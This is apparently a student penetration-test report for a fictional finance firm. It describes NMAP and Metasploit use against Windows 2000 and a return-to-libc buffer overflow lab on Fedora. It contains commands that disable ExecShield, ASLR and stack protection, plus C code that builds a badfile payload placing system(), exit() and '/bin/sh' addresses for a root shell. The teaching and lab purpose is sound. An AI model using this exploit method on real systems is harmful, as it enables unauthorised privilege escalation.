A penetration test was carried out by Ethical Hacking Ltd on two systems belonging to Greenway Finances Ltd: a Microsoft Windows 2000 Server SP2 machine and a Linux Fedora machine. A separate test plan was prepared for each system. Several vulnerabilities were found on the Windows 2000 Server machine; some of them are listed in this report, together with solutions that can be implemented.
Similarly, pieces of code were written and run on the Linux Fedora machine to test its susceptibility to a buffer overflow attack. The protection mechanisms that can be used to prevent this attack are listed.
Ethical Hacking Ltd, a systems penetration testing company, would like to perform a penetration test on two systems of Greenway Finances Ltd. The test is being done to check your systems for susceptibility to breaches. We will use different tools to test these systems and report the vulnerabilities found. For each vulnerability found, a solution will be proposed along with the cost of implementing it. The test will be conducted in three stages: Backup, Testing, and Rollback or Solution. In the first stage a backup of the servers will be taken to avoid loss of data. The second stage is the actual testing, where the prepared test cases will be applied to the systems. In the third stage we will either provide solutions for the problems found in the systems or roll the systems back to their original state, depending on feasibility.
Windows 2000 Server
1 computer/laptop with Windows 2000 Server SP2 and 1 computer/laptop with Ubuntu, or a single computer/laptop running both operating systems in virtual machines.
* I have used a laptop with a virtual machine running both operating systems.
* The steps to exploit Windows 2000 from Ubuntu were taken from the Metsploit_tutorial.doc file on UDO.
Load the operating systems onto the virtual machine.
Make the network connections between the operating systems.
Check the connection (ping each machine from the other).
Identify the ports which are open on the Windows operating system (using NMAP).
Exploit the Windows OS through the open ports (using the Metasploit Framework).
Buffer Overflow Attack
A buffer overflow attack is an attack in which an attacker takes advantage of a flaw in a program to manipulate code or data in memory. Whenever a function is called, the address of the next instruction in the caller (the return address) and the contents of some registers are pushed onto the stack; they are stored there so that execution can continue normally after the called function finishes. A buffer overflow occurs when the program writes more data into a fixed-size buffer on the stack than the buffer can hold, so the excess spills over the data stored above it. In a buffer overflow attack this spilled data is chosen by the attacker: the saved return address is overwritten with a different address, the address of code supplied by the attacker, so that when the function returns, the attacker's code runs instead of the caller.
Source of Image :- http://www.cs.ucla.edu/~kohler/class/05f-osp/notes/fig19-01.jpg
Tools Used :-
As per Wikipedia, NMAP stands for Network Mapper. It was written by Gordon Lyon and is used by the people who administer a network. It is difficult to draw a map of a network by hand when it has a large number of workstations; NMAP builds this map for them. It also reports the services exposed by the hosts it finds, such as shared printers and file shares. NMAP works as follows: it crafts special packets, sends them to the hosts it detects on the network, and analyses the replies; the map is prepared from those responses. It differs from simpler port scanners in that it also measures the round-trip delay of each host, adapts its timing when it detects congestion in the network, and so on. NMAP runs on Windows, Linux/Unix and other operating systems. Some of the features of NMAP include:
Host Discovery: NMAP identifies hosts on the network by sending packets, pinging, or probing for open ports.
Port Scanning: identifying which ports are open on a target workstation (host).
Version Detection: determining the name and version of the applications listening on those ports.
OS Detection: determining the operating system installed.
The Metasploit Project is an open-source computer security project. It provides information about security vulnerabilities and helps with penetration testing and with developing signatures for intrusion detection systems. It is best known for the Metasploit Framework, with which a programmer can write an exploit and run it against a remote target machine.
As per Wikipedia, the basic steps for exploiting a system using the Framework are:
Choose an exploit: code that triggers a known bug in the target system.
Check whether the intended target system is susceptible to the chosen exploit.
Choose a payload: the code that will be executed on the target machine if the exploit succeeds in gaining access.
Select an encoding technique so that an intrusion prevention system does not recognise the code.
Execute the exploit.
Vulnerabilities Found :-
As per Wikipedia, a Denial of Service (DoS) attack, as the name suggests, is an attack in which users are denied a service or resource they have requested. The attacker's motive may vary: some do it for fun, some to take revenge on a website, and some to push users towards another website. The usual method is for the attacker to send requests to the victim's machine continuously, saturating the target with external communication requests, so that the machine can no longer respond to legitimate traffic, or responds so slowly that it appears to be unavailable. A denial of service can also be local: if an attacker has compromised a user's computer and disabled HTTP on it, that user can no longer visit any web page, such as www.yahoo.com.
Remote Code Execution Allowed
In this type of attack the attacker can execute commands of their choosing on the target machine, inside any vulnerable process running on it. This is commonly known as remote code execution. The attacker sends input that triggers a bug in a program on the target, and the attacker's code first runs with that program's privileges, as an ordinary user process. From there it tries to escalate, for example to a kernel-level process from which every other process can be controlled. It is the worst type of attack because someone else is taking control of your machine. In technical terms, the attacker's input takes control of the program counter, also called the instruction pointer (IP): the register that holds the memory address of the next instruction to be executed. Once in control of it, the attacker changes that address to point at code of the attacker's choosing. After the attacker's code has run, control may be handed back to the original program so that the user does not notice anything. With this much control the attacker tries to take over the kernel and, once successful, turns the machine into a zombie: a computer that does whatever the attacker tells it to do, for example attacking other machines in turn.
Internet Information Services (IIS)
Internet Information Services (IIS) is web server software developed by Microsoft. It is included with Windows 2000 Server (as IIS 5.0) and with other Windows server editions, and is available as an optional component on other versions. Some companies use IIS to host their website on the local LAN. If an attacker gains control of this service, the attacker can reach the whole LAN from it, for example by planting a Trojan.
The Indexing Service is a service included with Windows. It builds an index of the files on the computer so that searches are fast. It runs as a privileged system service, so a flaw in it gives an attacker system-level access, and damage to its index can degrade the throughput of the OS to the point where the computer hangs. It should be disabled where it is not needed.
Testing Linux Fedora
As per Wikipedia, whenever the execution of a program is paused and control is transferred to a called function, the address in the program counter and the contents of the registers are stored on the stack. This is done so that the paused program can continue normally once control returns. A return-to-libc attack overwrites this return address on the stack with the address of a function that already exists in the process, and overwrites a further portion of the stack with the arguments for that function. The attacker can thus call any function already present on the machine, and no longer needs to inject malicious code into the program. The usual target is libc, the shared C standard library that nearly every program links against: attack the resource that is most important and always present, and that conveniently contains functions such as system(). The name is slightly misleading: control does not return to where the function was called from; the "return" points into libc instead of the original location. A non-executable stack prevents buffer overflow exploits that run injected code on the stack, but it does not prevent a return-to-libc attack, because no injected code is executed.
ExecShield Protection :
Attackers look for the memory location at which their code, or a library function, can be found, i.e. the address of the first instruction they want executed. ExecShield is a protection mechanism in the Fedora (Red Hat) kernel whose main effect is to mark the stack non-executable, so that exploit code placed on the stack cannot run. Fedora combines it with address-space randomization, which loads the stack, the libraries and (for suitably built programs) the executable at a different memory location every time the program starts: if the program was loaded at 10001AH once, it need not load there the next time. Because of this the attacker cannot predict where the application's code and data are, and finds it difficult to exploit. Fedora enables ExecShield by default; Ubuntu does not ship it (it is a Red Hat kernel patch). As a result, on Fedora a buffer overflow attack that has its exploit code on the stack will not work. To disable ExecShield in Fedora, use the following commands:
$ su root
Password: (enter root password)
# sysctl -w kernel.exec-shield=0
To prevent buffer overflows, the GCC compiler implements a protection mechanism known as StackGuard (the stack protector): a canary value is placed between the local buffers and the saved return address and is checked before the function returns, so an overflow that has reached the return address is detected and the program aborts instead of jumping to the attacker's address. With this protection on, the buffer overflow attack will not work. You can disable it when compiling the program with the switch -fno-stack-protector. For example, to compile a program example.c with StackGuard disabled, use the following command:
gcc -fno-stack-protector example.c
XVI32 is a free hex editor for Windows. It displays a file as both text (ASCII/ANSI) and hexadecimal, lets you modify the bytes of a file directly, can open very large files, and has a built-in script interpreter.
VMware Workstation is virtual machine software for both 32-bit and 64-bit computers. Its main use is to run an operating system without installing it on the physical computer, which is handy when you intend to change your operating system and want to see how another OS feels first. It is widely used by developers whose programs can crash the OS with a single mistake. There is no restriction to Windows or Linux: any guest OS can run on the host OS, and any number of copies of it.
Exploiting the Vulnerability (exploit1.c)
Here you need to create a badfile, with ExecShield disabled as described above. You also need the three addresses (system(), exit() and the "/bin/sh" string); XVI32 can be used to inspect badfile and write the addresses into it at the right offsets. If the badfile is correct, run the vulnerable program retlib.
Protection in /bin/bash
Here you need to bypass the restriction of bash: when /bin/sh is bash and the effective user ID differs from the real user ID, bash drops the elevated privileges, so the shell obtained from the Set-UID program is not a root shell. Hence first invoke setuid(0), which makes the real and effective user IDs both 0 before the shell starts.
Now we turn address randomization on again (the value 1 randomizes the stack and the mmap region, 2 also randomizes the heap, and 0 disables it). With randomization on, the addresses of system(), exit() and "/bin/sh" change on every run, so the fixed addresses written into badfile no longer hit their targets.
$ su root
Password: (enter root password)
# /sbin/sysctl -w kernel.randomize_va_space=1
Statements that Cause the Attack
int bof(FILE *badfile)
fread(buffer, sizeof(char), 40, badfile);
The fread() call takes 4 arguments: 1st the character array to fill, 2nd the size of each element (here 1 byte), 3rd the number of elements to read, and 4th the file pointer. Here the program reads 40 bytes and puts them into buffer. Because fread() does not check that the destination is large enough, and buffer is smaller than 40 bytes, a buffer overflow occurs: the excess bytes overwrite whatever lies above buffer on the stack, including the saved return address.
*(long *) &buf[X] = some address ; // "/bin/sh"
*(long *) &buf[Y] = some address ; // system()
*(long *) &buf[Z] = some address ; // exit()
Here we insert the three addresses into badfile at the offsets X, Y and Z: the address of the string "/bin/sh" (the argument passed to system()), the address of system() (which replaces the saved return address), and the address of exit() (where system() returns when the shell exits, so the program terminates cleanly instead of crashing). We can use XVI32 for this purpose.
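As an added example (not the report's exploit1.c), the following C code builds the 40-byte badfile with the three addresses at the offsets X, Y and Z from the statements above, and rejects a layout in which a slot overlaps another or runs past the end of the payload. The offsets and addresses used in main() and in the self-check are placeholder values, not addresses from the report's Fedora machine; on the real target they come from the debugger, and with address randomization on they change every run. The values are written byte by byte in little-endian order, which is what *(long *) &buf[X] = addr produces on 32-bit x86, so the code builds the same bytes on a 64-bit host.

```c
/* Added example, not from the report's exploit1.c: laying the three
 * addresses into the 40-byte badfile. Offsets and addresses are placeholders. */
#include <stdio.h>
#include <stdint.h>
#include <string.h>

#define PAYLOAD_LEN 40   /* the 40 bytes that bof() reads */

/* Store v little-endian at buf[off], the byte order *(long *)&buf[off] = v
 * produces on 32-bit x86. Returns 0, or -1 if the 4 bytes would run past buf. */
int put_le32(unsigned char *buf, size_t buflen, size_t off, uint32_t v)
{
    if (off > buflen || buflen - off < 4)
        return -1;
    for (int i = 0; i < 4; i++)
        buf[off + i] = (unsigned char)(v >> (8 * i));
    return 0;
}

/* Read a little-endian 32-bit value back; returns 0 if out of range. */
uint32_t get_le32(const unsigned char *buf, size_t buflen, size_t off)
{
    uint32_t v = 0;
    if (off > buflen || buflen - off < 4)
        return 0;
    for (int i = 3; i >= 0; i--)
        v = (v << 8) | buf[off + i];
    return v;
}

/* Two 4-byte slots overlap when they are less than 4 bytes apart. */
static int slots_overlap(size_t a, size_t b)
{
    return (a < b) ? (b - a < 4) : (a - b < 4);
}

/* Fill out[0..PAYLOAD_LEN) with filler and place:
 *   Y: address of system()  -> the slot holding the saved return address
 *   Z: address of exit()    -> what system() returns to when the shell exits
 *   X: address of "/bin/sh" -> system()'s first argument
 * In the classic 32-bit x86 frame these are consecutive: Z == Y + 4, X == Y + 8.
 * Returns 0, or -1 if a slot is out of range or overlaps another. */
int build_retlib_payload(unsigned char *out, size_t outlen,
                         size_t x, size_t y, size_t z,
                         uint32_t binsh_addr, uint32_t system_addr, uint32_t exit_addr)
{
    if (outlen < PAYLOAD_LEN)
        return -1;
    if (slots_overlap(x, y) || slots_overlap(y, z) || slots_overlap(x, z))
        return -1;
    memset(out, 'A', PAYLOAD_LEN);   /* filler: never executed, any byte works */
    if (put_le32(out, PAYLOAD_LEN, x, binsh_addr) != 0 ||
        put_le32(out, PAYLOAD_LEN, y, system_addr) != 0 ||
        put_le32(out, PAYLOAD_LEN, z, exit_addr) != 0)
        return -1;
    return 0;
}

/* 1 if the offsets follow the classic consecutive layout, else 0. */
int classic_layout(size_t x, size_t y, size_t z)
{
    return z == y + 4 && x == y + 8;
}

/* Self-check with placeholder values (not addresses from the report's target):
 * bad layouts are rejected and a good one reads back intact. Returns 1 or 0. */
int demo_build_and_check(void)
{
    unsigned char buf[PAYLOAD_LEN];
    const size_t x = 32, y = 24, z = 28;   /* placeholder offsets */

    if (build_retlib_payload(buf, sizeof buf, 26, y, z, 1, 2, 3) == 0)
        return 0;   /* x overlaps y: must be rejected */
    if (build_retlib_payload(buf, sizeof buf, 38, y, z, 1, 2, 3) == 0)
        return 0;   /* x runs past byte 40: must be rejected */
    if (build_retlib_payload(buf, sizeof buf, x, y, z,
                             0x11111111u, 0x22222222u, 0x33333333u) != 0)
        return 0;
    return get_le32(buf, sizeof buf, x) == 0x11111111u
        && get_le32(buf, sizeof buf, y) == 0x22222222u
        && get_le32(buf, sizeof buf, z) == 0x33333333u
        && buf[0] == 'A' && classic_layout(x, y, z);
}

/* Write the payload to the file the vulnerable program reads. */
int write_badfile(const char *path, const unsigned char *buf, size_t len)
{
    FILE *fp = fopen(path, "wb");
    if (fp == NULL)
        return -1;
    size_t n = fwrite(buf, 1, len, fp);
    return (fclose(fp) == 0 && n == len) ? 0 : -1;
}

int main(void)
{
    unsigned char badfile[PAYLOAD_LEN];
    /* Placeholder offsets/addresses; the real ones come from gdb on the target. */
    if (build_retlib_payload(badfile, sizeof badfile, 32, 24, 28,
                             0x11111111u, 0x22222222u, 0x33333333u) != 0 ||
        write_badfile("badfile", badfile, sizeof badfile) != 0) {
        fprintf(stderr, "could not build badfile\n");
        return 1;
    }
    printf("badfile written; self-check %s\n", demo_build_and_check() ? "ok" : "FAILED");
    return 0;
}
```

Because bof() reads badfile with fread() rather than strcpy(), zero bytes inside the addresses are not a problem; the only layout constraints are the ones checked here, namely that the three slots fit in the 40 bytes and do not overwrite each other.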
Fig. (2) Fedora IP Address
Fig. (3) Using DHCP
Fig. (4) Windows IP Address
Fig. (5) Ping to Fedora
Fig. (6) Switching off ASLR
Fig. (7) Showing Buffer Content